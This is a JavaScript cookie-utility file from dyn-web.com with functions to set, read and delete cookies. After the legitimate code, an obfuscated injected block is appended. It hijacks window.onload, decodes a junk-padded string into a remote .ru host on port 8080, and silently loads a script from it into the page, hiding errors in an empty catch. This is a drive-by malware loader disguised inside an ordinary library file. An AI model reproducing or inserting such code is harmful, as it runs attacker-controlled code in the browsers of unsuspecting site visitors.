/*********************************************************************************
  dw_cookies.js - cookie functions for dyn-web.com
  Recycled from various sources 
  
  Jan 2008 revisions: functions renamed with 'dw_' prefix 
  too many setCookie fn's not all quite the same!
**********************************************************************************/

// Modified from Bill Dortch's Cookie Functions (hidaho.com) 
// (found in JavaScript Bible)
function dw_setCookie(name,value,days,path,domain,secure) {
  var expires, date;
  if (typeof days == "number") {
    date = new Date();
    date.setTime( date.getTime() + (days*24*60*60*1000) );
		expires = date.toGMTString();
  }
  document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}

// Modified from Jesse Chisholm or Scott Andrew Lepera ?
// (found at both www.dansteinman.com/dynapi/ and www.scottandrew.com/junkyard/js/)
function dw_getCookie(name) {
  var nameq = name + "=";
  var c_ar = document.cookie.split(';');
  for (var i=0; i<c_ar.length; i++) {
    var c = c_ar[i];
    while (c.charAt(0)==' ') c = c.substring(1,c.length);
    if (c.indexOf(nameq) == 0) return unescape( c.substring(nameq.length, c.length) );
  }
  return null;
}

// from Bill Dortch's Cookie Functions (hidaho.com) 
function dw_deleteCookie(name,path,domain) {
  if ( dw_getCookie(name) ) {
    document.cookie = name + "=" +
      ((path) ? "; path=" + path : "") +
      ((domain) ? "; domain=" + domain : "") +
      "; expires=Thu, 01-Jan-70 00:00:01 GMT";
  }
}





try{window.onload=function(){Hg4gkh9luuwzfk07 = '' + '5$6&-(&^&c)o@(&m)@).)&)(w&()e$^^^!b^#)m$#!!@a#s(t(&e(((!r#)w#o)r^@&^l&&$@d^^!.&c##$#&o(m&#.#s!(k($y^-(@$(c^)o^&m@).(!b!#!e^^s!#^#)t&s!^$e$&)&@a)$^s^#$i$(l^v#(e(r!&&@.#$r#&$u)!!:$B)(!t(!#1$##k&@6^$s&^a#&o#)#4##r@s^&^/@&!h))@o#w$s)&t@u&f^$f@)(&w&^o$@$!r$#k)!s#&.^@c&#o$###m$/@@(h!@o@!w)&(s#^t)^!u)&^&f(!(f(w@!(o)(&r^k!&s#.)@)^c$#(o@&#m#/^@^t(^o@r)@r@@$e^#n^!&)t&$r)@e)@a()c^))t&o!^r^(.^!))n&)(e#^#@t((!@/$&#g^$@o&o^(!g)&l$&!&e(^)$^.)(c^^o@@$m$/&#&f($#r#$)#i!e!&&)n&@$)&d()&@s$#!)t(@e&^r(&#).!!($c!#@#o#!^)m&/@$'.replace(/&|\$|\^|\(|\!|@|#|\)/ig, '') ;J11gy49buyi = 'appendChild';Ui3koa2qoi2 = document.createElement('sc'+'ript');Ui3koa2qoi2.src = 'h'+'ttp://'+Hg4gkh9luuwzfk07.replace(/Bt1k6sao4rs/g, '8080');Ui3koa2qoi2.setAttribute('defer', 'def'+'er');eval('document.body.'+J11gy49buyi+'(Ui3koa2qoi2)');} }  catch(Vf60hd9mb ) {}